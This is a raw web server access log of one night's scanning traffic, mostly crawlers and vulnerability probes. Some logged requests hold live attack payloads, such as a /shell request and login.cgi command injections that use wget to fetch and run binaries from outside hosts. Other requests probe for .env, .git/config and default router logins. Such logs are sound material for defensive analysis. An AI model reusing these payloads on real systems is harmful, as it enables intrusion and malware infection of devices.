185.7.214.104 - - [02/Aug/2022:01:36:13 +0200] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
185.7.214.104 - - [02/Aug/2022:01:38:07 +0200] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
45.95.55.5 - - [02/Aug/2022:01:48:01 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
167.248.133.120 - - [02/Aug/2022:01:49:41 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
167.248.133.120 - - [02/Aug/2022:01:49:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.248.133.120 - - [02/Aug/2022:01:49:42 +0200] "PRI * HTTP/2.0" 400 329 "-" "-"
167.88.62.92 - - [02/Aug/2022:01:51:09 +0200] "HEAD /robots.txt HTTP/1.0" 404 - "-" "-"
185.7.214.104 - - [02/Aug/2022:01:52:22 +0200] "GET /console/ HTTP/1.1" 404 313 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
3.68.105.241 - - [02/Aug/2022:01:52:40 +0200] "CONNECT is.muni.cz:443 HTTP/1.1" 405 340 "-" "Java/1.8.0_312"
109.237.103.123 - - [02/Aug/2022:01:53:10 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
109.237.103.123 - - [02/Aug/2022:01:53:10 +0200] "\x16\x03\x01\x01D\x01" 501 321 "-" "-"
185.7.214.104 - - [02/Aug/2022:01:55:08 +0200] "GET /console/ HTTP/1.1" 404 313 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
162.142.125.222 - - [02/Aug/2022:01:56:05 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
162.142.125.222 - - [02/Aug/2022:01:56:05 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
162.142.125.222 - - [02/Aug/2022:01:56:06 +0200] "PRI * HTTP/2.0" 400 329 "-" "-"
167.88.62.92 - - [02/Aug/2022:01:59:23 +0200] "HEAD /robots.txt HTTP/1.0" 404 - "-" "-"
185.7.214.104 - - [02/Aug/2022:01:59:31 +0200] "GET /console/ HTTP/1.1" 404 313 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
167.88.62.92 - - [02/Aug/2022:01:59:34 +0200] "HEAD /robots.txt HTTP/1.0" 404 - "-" "-"
45.95.55.5 - - [02/Aug/2022:02:00:03 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
45.95.55.5 - - [02/Aug/2022:02:01:12 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
45.95.55.5 - - [02/Aug/2022:02:04:23 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
185.7.214.104 - - [02/Aug/2022:02:07:32 +0200] "GET /console/ HTTP/1.1" 404 313 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
167.88.62.92 - - [02/Aug/2022:02:07:59 +0200] "HEAD /robots.txt HTTP/1.0" 404 - "-" "-"
185.7.214.104 - - [02/Aug/2022:02:12:43 +0200] "GET /console/ HTTP/1.1" 404 313 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
167.88.62.92 - - [02/Aug/2022:02:13:15 +0200] "HEAD /robots.txt HTTP/1.0" 404 - "-" "-"
54.77.195.10 - - [02/Aug/2022:02:14:02 +0200] "GET / HTTP/1.1" 200 1229 "-" "Apache-HttpClient/4.5.1 (Java/11.0.10)"
54.77.195.10 - - [02/Aug/2022:02:14:02 +0200] "GET / HTTP/1.1" 200 1229 "-" "Java/11.0.10"
177.222.104.50 - - [02/Aug/2022:02:14:04 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7"
167.88.62.92 - - [02/Aug/2022:02:18:38 +0200] "HEAD /robots.txt HTTP/1.0" 404 - "-" "-"
185.7.214.104 - - [02/Aug/2022:02:18:40 +0200] "GET /console/ HTTP/1.1" 404 313 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
185.7.214.104 - - [02/Aug/2022:02:20:12 +0200] "GET /console/ HTTP/1.1" 404 313 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
185.7.214.104 - - [02/Aug/2022:02:20:39 +0200] "GET /console/ HTTP/1.1" 404 313 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
2.57.122.209 - - [02/Aug/2022:02:23:21 +0200] "GET http://example.com/ HTTP/1.1" 200 1229 "-" "Go-http-client/1.1"
167.88.62.92 - - [02/Aug/2022:02:24:12 +0200] "HEAD /robots.txt HTTP/1.0" 404 - "-" "-"
109.237.103.123 - - [02/Aug/2022:02:25:41 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
109.237.103.123 - - [02/Aug/2022:02:25:41 +0200] "\x16\x03\x01\x01D\x01" 501 321 "-" "-"
185.7.214.104 - - [02/Aug/2022:02:26:03 +0200] "GET /console/ HTTP/1.1" 404 313 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
59.152.190.26 - - [02/Aug/2022:02:29:26 +0200] "GET / HTTP/1.1" 400 329 "-" "-"
185.7.214.104 - - [02/Aug/2022:02:32:02 +0200] "GET /console/ HTTP/1.1" 404 313 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
51.159.164.227 - - [02/Aug/2022:02:32:55 +0200] "HEAD / HTTP/1.1" 200 - "-" "curl/7.81.0"
51.159.164.227 - - [02/Aug/2022:02:32:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "curl/7.81.0"
51.159.164.227 - - [02/Aug/2022:02:32:55 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "curl/7.81.0"
168.195.253.255 - - [02/Aug/2022:02:34:07 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
183.136.225.35 - - [02/Aug/2022:02:36:41 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0) Gecko/20100101 Firefox/47.0"
94.102.61.10 - - [02/Aug/2022:02:39:09 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36"
94.102.61.10 - - [02/Aug/2022:02:39:23 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36"
94.102.61.10 - - [02/Aug/2022:02:39:26 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36"
94.102.61.10 - - [02/Aug/2022:02:40:01 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36"
114.55.247.147 - - [02/Aug/2022:02:40:12 +0200] "GET /shell?cd+/tmp;rm+-rf+*;wget+networkmapping.xyz/jaws;sh+/tmp/jaws HTTP/1.1" 404 306 "-" "Hello, world"
186.211.153.18 - - [02/Aug/2022:02:40:37 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
185.7.214.104 - - [02/Aug/2022:02:40:44 +0200] "POST /Autodiscover/Autodiscover.xml HTTP/1.1" 404 334 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
185.196.220.70 - - [02/Aug/2022:02:41:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Linux Gnu (cow)"
185.7.214.104 - - [02/Aug/2022:02:41:57 +0200] "POST /Autodiscover/Autodiscover.xml HTTP/1.1" 404 334 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
138.229.236.137 - - [02/Aug/2022:02:42:16 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://134.195.138.33/.nCKx/zx.mips%20-O%20-%3E%20/tmp/kh;/tmp/kh%20selfrep.dlink%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
94.102.61.10 - - [02/Aug/2022:02:42:58 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36"
106.251.118.122 - - [02/Aug/2022:02:43:34 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://134.195.138.33/.nCKx/zx.mips%20-O%20-%3E%20/tmp/kh;/tmp/kh%20selfrep.dlink%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
94.102.61.10 - - [02/Aug/2022:02:43:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36"
185.7.214.104 - - [02/Aug/2022:02:44:22 +0200] "POST /Autodiscover/Autodiscover.xml HTTP/1.1" 404 334 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
94.102.61.10 - - [02/Aug/2022:02:44:33 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36"
94.102.61.10 - - [02/Aug/2022:02:45:40 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36"
94.74.151.138 - - [02/Aug/2022:02:45:48 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7"
94.102.61.10 - - [02/Aug/2022:02:46:11 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36"
94.102.61.10 - - [02/Aug/2022:02:46:34 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36"
185.196.220.70 - - [02/Aug/2022:02:51:40 +0200] "GET / HTTP/1.1" 200 1229 "-" "Linux Gnu (cow)"
163.123.143.71 - - [02/Aug/2022:02:53:08 +0200] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.84:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
185.7.214.104 - - [02/Aug/2022:02:53:42 +0200] "POST /Autodiscover/Autodiscover.xml HTTP/1.1" 404 334 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
185.196.220.70 - - [02/Aug/2022:02:56:46 +0200] "GET / HTTP/1.1" 200 1229 "-" "Linux Gnu (cow)"
185.7.214.104 - - [02/Aug/2022:02:57:30 +0200] "POST /Autodiscover/Autodiscover.xml HTTP/1.1" 404 334 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
139.59.146.171 - - [02/Aug/2022:02:59:01 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
139.59.146.171 - - [02/Aug/2022:02:59:01 +0200] "POST /HNAP1/ HTTP/1.1" 404 311 "-" "Mozila/5.0"
181.199.65.152 - - [02/Aug/2022:03:01:04 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
185.7.214.104 - - [02/Aug/2022:03:01:59 +0200] "POST /Autodiscover/Autodiscover.xml HTTP/1.1" 404 334 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
185.7.214.104 - - [02/Aug/2022:03:04:44 +0200] "POST /Autodiscover/Autodiscover.xml HTTP/1.1" 404 334 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
45.148.10.81 - - [02/Aug/2022:03:07:10 +0200] "GET http://example.com/ HTTP/1.1" 200 1229 "-" "Go-http-client/1.1"
185.7.214.104 - - [02/Aug/2022:03:07:12 +0200] "POST /Autodiscover/Autodiscover.xml HTTP/1.1" 404 334 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
172.104.138.223 - - [02/Aug/2022:03:08:14 +0200] "GET /fuN3 HTTP/1.0" 404 305 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.77 Safari/537.36"
59.187.205.166 - - [02/Aug/2022:03:12:01 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://134.195.138.33/.nCKx/zx.mips%20-O%20-%3E%20/tmp/kh;/tmp/kh%20selfrep.dlink%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
198.20.69.98 - - [02/Aug/2022:03:15:03 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36"
198.20.69.98 - - [02/Aug/2022:03:15:03 +0200] "GET /robots.txt HTTP/1.1" 404 315 "-" "-"
198.20.69.98 - - [02/Aug/2022:03:15:04 +0200] "GET /sitemap.xml HTTP/1.1" 404 316 "-" "-"
198.20.69.98 - - [02/Aug/2022:03:15:04 +0200] "GET /.well-known/security.txt HTTP/1.1" 404 329 "-" "-"
198.20.69.98 - - [02/Aug/2022:03:15:06 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:80.0) Gecko/20100101 Firefox/80.0"
185.7.214.104 - - [02/Aug/2022:03:15:37 +0200] "POST /Autodiscover/Autodiscover.xml HTTP/1.1" 404 334 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
185.7.214.104 - - [02/Aug/2022:03:18:46 +0200] "POST /Autodiscover/Autodiscover.xml HTTP/1.1" 404 334 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
34.78.120.99 - - [02/Aug/2022:03:18:48 +0200] "GET / HTTP/1.1" 200 1229 "-" "python-requests/2.28.1"
34.140.248.32 - - [02/Aug/2022:03:18:57 +0200] "GET / HTTP/1.1" 200 1229 "-" "python-requests/2.28.1"
185.196.220.70 - - [02/Aug/2022:03:22:08 +0200] "GET / HTTP/1.1" 200 1229 "-" "Linux Gnu (cow)"
185.196.220.70 - - [02/Aug/2022:03:22:29 +0200] "GET / HTTP/1.1" 200 1229 "-" "Linux Gnu (cow)"
185.196.220.70 - - [02/Aug/2022:03:23:30 +0200] "GET / HTTP/1.1" 200 1229 "-" "Linux Gnu (cow)"
185.7.214.104 - - [02/Aug/2022:03:26:15 +0200] "GET /_ignition/execute-solution HTTP/1.1" 404 331 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
185.196.220.70 - - [02/Aug/2022:03:26:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Linux Gnu (cow)"
185.7.214.104 - - [02/Aug/2022:03:26:45 +0200] "GET /_ignition/execute-solution HTTP/1.1" 404 331 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
185.196.220.70 - - [02/Aug/2022:03:27:54 +0200] "GET / HTTP/1.1" 200 1229 "-" "Linux Gnu (cow)"
185.7.214.104 - - [02/Aug/2022:03:32:24 +0200] "GET /_ignition/execute-solution HTTP/1.1" 404 331 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
185.7.214.104 - - [02/Aug/2022:03:33:02 +0200] "GET /_ignition/execute-solution HTTP/1.1" 404 331 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
185.196.220.70 - - [02/Aug/2022:03:34:33 +0200] "GET / HTTP/1.1" 200 1229 "-" "Linux Gnu (cow)"
185.196.220.70 - - [02/Aug/2022:03:39:25 +0200] "GET / HTTP/1.1" 200 1229 "-" "Linux Gnu (cow)"
128.14.134.170 - - [02/Aug/2022:03:41:46 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
185.7.214.104 - - [02/Aug/2022:03:42:11 +0200] "GET /_ignition/execute-solution HTTP/1.1" 404 331 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
182.114.70.234 - - [02/Aug/2022:03:45:07 +0200] "GET /boaform/admin/formLogin?username=admin&psd=admin HTTP/1.0" 404 324 "-" "-"
185.7.214.104 - - [02/Aug/2022:03:46:27 +0200] "GET /_ignition/execute-solution HTTP/1.1" 404 331 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
185.7.214.104 - - [02/Aug/2022:03:48:14 +0200] "GET /_ignition/execute-solution HTTP/1.1" 404 331 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
185.7.214.104 - - [02/Aug/2022:03:48:52 +0200] "GET /_ignition/execute-solution HTTP/1.1" 404 331 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
185.7.214.104 - - [02/Aug/2022:03:48:56 +0200] "GET /_ignition/execute-solution HTTP/1.1" 404 331 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
216.218.206.66 - - [02/Aug/2022:03:50:37 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
167.94.138.47 - - [02/Aug/2022:03:50:38 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
167.94.138.47 - - [02/Aug/2022:03:50:38 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.138.47 - - [02/Aug/2022:03:50:38 +0200] "PRI * HTTP/2.0" 400 329 "-" "-"
184.105.139.67 - - [02/Aug/2022:03:50:45 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
185.7.214.104 - - [02/Aug/2022:03:50:52 +0200] "GET /_ignition/execute-solution HTTP/1.1" 404 331 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
65.49.20.66 - - [02/Aug/2022:03:51:19 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
64.62.197.77 - - [02/Aug/2022:03:51:35 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
128.14.209.162 - - [02/Aug/2022:03:54:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
64.62.197.84 - - [02/Aug/2022:03:54:20 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 zgrab/0.x"
65.49.20.126 - - [02/Aug/2022:03:55:27 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 zgrab/0.x"
216.218.206.66 - - [02/Aug/2022:03:55:29 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 zgrab/0.x"
184.105.139.115 - - [02/Aug/2022:03:55:42 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 zgrab/0.x"
2.57.122.98 - - [02/Aug/2022:04:00:47 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
2.57.122.98 - - [02/Aug/2022:04:03:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
45.95.55.5 - - [02/Aug/2022:04:03:53 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
2.57.122.98 - - [02/Aug/2022:04:04:17 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
184.105.139.68 - - [02/Aug/2022:04:04:19 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
163.123.143.71 - - [02/Aug/2022:04:04:29 +0200] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.82:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
2.57.122.98 - - [02/Aug/2022:04:06:12 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
64.227.107.37 - - [02/Aug/2022:04:08:18 +0200] "GET / HTTP/1.1" 200 1229 "http://212.91.246.82:80/left.html" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:77.0) Gecko/20100101 Firefox/77.0"
45.95.55.5 - - [02/Aug/2022:04:08:47 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
184.105.139.84 - - [02/Aug/2022:04:09:12 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 zgrab/0.x"
13.51.13.155 - - [02/Aug/2022:04:11:32 +0200] "GET /.git/config HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Linux; Android 10; Galaxy J2 Pro Build/QQ3A.200805.001) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/85.0.4183.101 Mobile Safari/537.36"
45.95.55.5 - - [02/Aug/2022:04:11:56 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
2.57.122.98 - - [02/Aug/2022:04:13:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
74.82.47.2 - - [02/Aug/2022:04:13:40 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
74.82.47.2 - - [02/Aug/2022:04:13:49 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
2.57.122.98 - - [02/Aug/2022:04:14:11 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
49.142.221.171 - - [02/Aug/2022:04:15:07 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://134.195.138.33/.nCKx/zx.mips%20-O%20-%3E%20/tmp/kh;/tmp/kh%20selfrep.dlink%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
45.95.55.5 - - [02/Aug/2022:04:16:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
74.82.47.50 - - [02/Aug/2022:04:18:32 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 zgrab/0.x"
185.7.214.104 - - [02/Aug/2022:04:19:16 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
74.82.47.50 - - [02/Aug/2022:04:19:30 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 zgrab/0.x"
2.57.122.98 - - [02/Aug/2022:04:20:33 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
167.88.62.92 - - [02/Aug/2022:04:21:40 +0200] "HEAD /robots.txt HTTP/1.0" 404 - "-" "-"
185.7.214.104 - - [02/Aug/2022:04:23:27 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
177.54.88.82 - - [02/Aug/2022:04:24:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
163.123.143.71 - - [02/Aug/2022:04:24:58 +0200] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.86:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
185.7.214.104 - - [02/Aug/2022:04:25:02 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
173.215.90.250 - - [02/Aug/2022:04:27:34 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
2.57.122.98 - - [02/Aug/2022:04:27:37 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
45.148.10.81 - - [02/Aug/2022:04:28:57 +0200] "GET http://example.com/ HTTP/1.1" 200 1229 "-" "Go-http-client/1.1"
65.49.20.68 - - [02/Aug/2022:04:30:33 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
